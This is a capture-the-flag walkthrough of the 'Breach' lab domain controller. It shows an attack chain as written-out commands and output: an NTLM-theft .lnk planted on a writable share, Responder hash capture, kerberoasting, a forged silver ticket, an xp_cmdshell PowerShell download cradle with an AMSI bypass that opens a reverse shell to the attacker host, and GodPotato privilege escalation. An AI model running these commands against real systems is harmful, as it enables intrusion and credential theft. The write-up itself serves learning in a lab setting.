Breach (Windows Medium) | SidePieceVillage

Breach is a Windows Medium box that starts with Guest auth to shares. Having read/write to one share, we upload a lnk file and receive a user hash. This hash is used to kerberoast SPNs which gets a hash for svc_mssql user. As we have a Service Account, we can create a silver ticket. After creation, we connect as Administrator to a MSSQL instance and can run commands via xp_cmdshell. Only after bypassing AMSI do you get a reverse shell. Once on the machine, checking our privileges we have SeImpersonate available to us. Using GodPotato we create a user and add them to the Administrators group, and connect as Admin via evil-winrm.

Initial Nmap

PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp   open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-03-28 00:08:14Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack ttl 127
1433/tcp open  ms-sql-s      syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack ttl 127
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
Service Info: Host: BREACHDC; OS: Windows; CPE: cpe:/o:microsoft:windows

SMB

Trying as Guest allows us access to the share on the DC.

$ nxc smb 10.10.92.126 -u Guest -p '' --shares

SMB         10.10.92.126    445    BREACHDC         [*] Windows Server 2022 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:False)
SMB         10.10.92.126    445    BREACHDC         [+] breach.vl\Guest: 
SMB         10.10.92.126    445    BREACHDC         [*] Enumerated shares
SMB         10.10.92.126    445    BREACHDC         Share           Permissions     Remark
SMB         10.10.92.126    445    BREACHDC         -----           -----------     ------
SMB         10.10.92.126    445    BREACHDC         ADMIN$                          Remote Admin
SMB         10.10.92.126    445    BREACHDC         C$                              Default share
SMB         10.10.92.126    445    BREACHDC         IPC$            READ            Remote IPC
SMB         10.10.92.126    445    BREACHDC         NETLOGON                        Logon server share 
SMB         10.10.92.126    445    BREACHDC         share           READ,WRITE      
SMB         10.10.92.126    445    BREACHDC         SYSVOL                          Logon server share 
SMB         10.10.92.126    445    BREACHDC         Users           READ

We have read/write to the share. Looking over it we see some directories we can access.

smbmap -u Guest -p '' -d breach.vl -H 10.10.92.126 -R share
[+] IP: 10.10.92.126:445        Name: breachdc.breach.vl                                
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        share                                                   READ, WRITE
        .\share\*
        dr--r--r--                0 Thu Mar 27 19:29:56 2025    .
        dr--r--r--                0 Thu Feb 17 09:38:00 2022    ..
        dr--r--r--                0 Thu Mar 27 19:25:05 2025    finance
        dr--r--r--                0 Thu Feb 17 05:19:13 2022    software
        dr--r--r--                0 Thu Mar 27 19:25:26 2025    transfer
        .\share\finance\*
        dr--r--r--                0 Thu Mar 27 19:25:05 2025    .
        dr--r--r--                0 Thu Mar 27 19:29:56 2025    ..
        .\share\software\*
        dr--r--r--                0 Thu Mar 27 19:25:17 2025    .
        dr--r--r--                0 Thu Mar 27 19:29:56 2025    ..
        .\share\transfer\*
        dr--r--r--                0 Thu Mar 27 19:25:26 2025    .
        dr--r--r--                0 Thu Mar 27 19:29:56 2025    ..
        dr--r--r--                0 Thu Feb 17 05:23:51 2022    claire.pope
        dr--r--r--                0 Thu Feb 17 05:23:22 2022    diana.pope
        dr--r--r--                0 Thu Feb 17 05:24:39 2022    julia.wong

NTLM Theft

We can drop and scf or lnk file and see if we can any clicks.

$ python3 ntlm_theft.py --generate lnk --server 10.8.4.29 --filename freeCandy
Created: freeCandy/freeCandy.lnk (BROWSE TO FOLDER)
Generation Complete.

$ impacket-smbclient 'breach.vl/Guest@breach.vl' -no-pass
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies 

Type help for list of commands
# shares                                                   
ADMIN$                                                     
C$                                                         
IPC$                                                       
NETLOGON                                                   
share                                                      
SYSVOL                                                     
Users                                                      
# use share                                                
# ls                                                       
drw-rw-rw-          0  Fri Mar 28 08:16:30 2025 .
drw-rw-rw-          0  Thu Feb 17 09:38:00 2022 ..
drw-rw-rw-          0  Thu Feb 17 05:19:36 2022 finance
drw-rw-rw-          0  Thu Feb 17 05:19:13 2022 software
drw-rw-rw-          0  Thu Feb 17 08:00:35 2022 transfer
# cd transfer                                              
# ls                                                       
drw-rw-rw-          0  Thu Feb 17 08:00:35 2022 .
drw-rw-rw-          0  Fri Mar 28 08:16:30 2025 ..
drw-rw-rw-          0  Thu Feb 17 05:23:51 2022 claire.pope 
drw-rw-rw-          0  Thu Feb 17 05:23:22 2022 diana.pope
drw-rw-rw-          0  Thu Feb 17 05:24:39 2022 julia.wong
# put freeCandy.lnk                                        
# exit

And we can put it in the transfer folder where the users are at. After we setup responder and see if we get a hit.

$ sudo responder -I tun0

[+] Listening for events...
[SMB] NTLMv2-SSP Client   : 10.10.92.126
[SMB] NTLMv2-SSP Username : BREACH\Julia.Wong
[SMB] NTLMv2-SSP Hash     : Julia.Wong::BREACH:0526add1eaef5104:1DD6932CED548FA48BD4BED2516A3E02:01010000000000008061771E4D9FDB018B3185DF3D296F610000000002000800570041004100560001001E00570049004E002D00360042003100300033004F00470059004D004B<SNIP>
[*] Skipping previously captured hash for BREACH\Julia.Wong

Once cracked, we can get a dump for bloodhound. After getting a list of users.

1	$ nxc smb breach.vl -u julia.wong -p <SNIP> --rid-brute \| grep SidTypeUser \| cut -d '\' -f2 \| awk '{print $1}' > users.list

Kerberoasting

Following general rule of thumb, when we have credentials we try kerberoasting. We can see if we have any SPNs associated with this user.

$ GetUserSPNs.py 'breach.vl/julia.wong:<SNIP>'         
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName              Name       MemberOf  PasswordLastSet             LastLogon                   Delegation 
--------------------------------  ---------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/breachdc.breach.vl:1433  svc_mssql            2022-02-17 04:43:08.106169  2025-03-28 08:08:15.526819             

$ GetUserSPNs.py 'breach.vl/julia.wong:<SNIP>' -request-user svc_mssql
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName              Name       MemberOf  PasswordLastSet             LastLogon                   Delegation 
--------------------------------  ---------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/breachdc.breach.vl:1433  svc_mssql            2022-02-17 04:43:08.106169  2025-03-28 08:08:15.526819             

[-] CCache file is not found. Skipping...
$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$94460cab00e138498318d889ae9d858d$ebfbc9219ec245123242aa4a3b5408c548d7dd7afb1926b61936c422b74fed99f0414f59d3cad89f18afc227c4d0275048a11c91816eae8248d9fa69e1f30ccb77b76020f07ea4452f2af9352e1817f92a9758a4099e76402df858ecb54abb9f170179107dff4fb442b7a5437a348476398b0459<SNIP>

And we get a hit on svc_mssql, when we crack the hash we get a clear text cred we can use against the open port 1433/mssql.

Silver Ticket Attack

Since we have valid credentials to a service account(MSSQL). We can create a silver ticket which will give us administrative rights when we connect to the mssql instance. If we did it now we wouldn’t have the ability to run commands.

$ impacket-mssqlclient 'breach.vl/svc_mssql:<SNIP>@breach.vl' -windows-auth
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (BREACH\svc_mssql  guest@master)> enable_xp_cmdshell
ERROR(BREACHDC\SQLEXPRESS): Line 105: User does not have permission to perform this action.
ERROR(BREACHDC\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(BREACHDC\SQLEXPRESS): Line 105: User does not have permission to perform this action.
ERROR(BREACHDC\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
SQL (BREACH\svc_mssql  guest@master)>

So we use impacket-ticketer to create our ticket. First we need to convert the password to a nthash with a converter online. Then we must get the domain sid. We can obtain that a couple of ways, using impacket tools such as lookupsid, getPac, nxc, bloodhound data. Then we create our ticket. Ensure to use // when entering the service or you will get an error when kerberos looks for the ticket. This is in some cases, at least it was for me

$ impacket-getPac 'breach.vl/svc_mssql:<SNIP>' -targetUser 'svc_mssql'
<SNIP>
ResourceGroupDomainSid:          NULL           
ResourceGroupCount:              0                                                                                    
ResourceGroupIds:                NULL                                                                                 
Domain SID: S-1-5-21-2330692793-3312915120-706255856 

$ impacket-ticketer -nthash '0006C7AA1E800E17F8E78870E2000' -spn 'MSSQLSvc//breachdc.breach.vl:1433' -domain 'breach.vl' -domain-sid 'S-1-5-21-2330692793-3312915120-706255856' -user-id '500' Administrator
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies 
                                                           
[*] Creating basic skeleton ticket and PAC Infos 
[*] Customizing ticket for breach.vl/Administrator
[*] PAC_LOGON_INFO 
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart                                
[*] Signing/Encrypting final ticket    
[*]     PAC_SERVER_CHECKSUM                             
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in Administrator.ccache

After creation, we can export it and connect using kerberos.

$ export KRB5CCNAME=Administrator.ccache
$ impacket-mssqlclient -dc-ip 10.10.112.98 -k -no-pass 'breach.vl/Administrator@breach.vl' -windows-auth -debug
Impacket v0.13.0.dev0+20241024.90011.835e1755 - Copyright Fortra, LLC and its affiliated companies 

[+] Impacket Library Installation Path: /usr/local/lib/python3.11/dist-packages/impacket-0.13.0.dev0+20241024.90011.835e1755-py3.11.egg/impacket
[*] Encryption required, switching to TLS
[+] Using Kerberos Cache: Administrator.ccache 
[+] SPN MSSQLSVC/:1433@BREACH.VL not found in cache       
[+] AnySPN is True, looking for another suitable SPN   
[+] Returning cached credential for MSSQLSVC/@BREACH.VL  
[+] Using TGS from cache                                  
[+] Changing sname from MSSQLSvc/@BREACH.VL to MSSQLSVC/:1433@BREACH.VL and hoping for the best
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english 
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (BREACH\Administrator  dbo@master)>

Now we can run a commands. After enabling xp_cmdshell we run the following with our listener up:

SQL (BREACH\Administrator  dbo@master)> xp_cmdshell echo IEX((New-Object Net.WebClient).DownloadString("http://10.8.4.29/a2.ps1")) | powershell -noprofile
---
$ sudo python3 -m http.server 80                 
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.112.98 - - [28/Mar/2025 11:16:18] "GET /a2.ps1 HTTP/1.1" 200 -
10.10.112.98 - - [28/Mar/2025 11:16:58] "GET /cradle.ps1 HTTP/1.1" 200 -
10.10.112.98 - - [28/Mar/2025 11:16:59] "GET /sm.ps1 HTTP/1.1" 200 -

a2.ps1 is a AMSI-Bypass tha once finished will reach out again for the cradle.ps1
cradle.ps1 will reach out again for the reverse shell.
sm.ps1 is the full reverse shell. Nishang Oneliner.

This get us a reverse shell. Finally!!

PrivEsc

$ rlwrap nc -lvnp 9002                                                                           
listening on [any]9002 ...
connect to [10.8.4.29] from (UNKNOWN) [10.10.112.98]58767
PS C:\Windows\system32> cd \programdata
PS C:\programdata> ls

After looking at our privileges we can see our easy out.

1
2
3

SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled

Transfered GodPotato over and created a user and added them to the Administrators group.

PS C:\programdata> .\GP.exe -cmd "cmd /c net user das Password123! /add && net localgroup Administrators das /add"
[*] CombaseModule: 0x140728437833728
[*] DispatchTable: 0x140728440424312
[*] UseProtseqFunction: 0x140728439716656
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\3d715370-aea5-445c-99d8-44b10fe45380\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000a002-020c-ffff-8d0d-32b15ac3e33c
[*] DCOM obj OXID: 0x5accc6eeede9cc5
[*] DCOM obj OID: 0x3ea5b1981acb83fd
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 104 Token:0x756  User: NT AUTHORITY\SYSTEM ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 2084
The command completed successfully.

The command completed successfully.

Lets get on the system.

$ evil-winrm -i breach.vl -u das -p 'Password123!'

Evil-WinRM shell v3.5
                                                            
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\das\Documents> whoami /all
<SNIP>
BUILTIN\Administrators                     Alias            S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
<SNIP>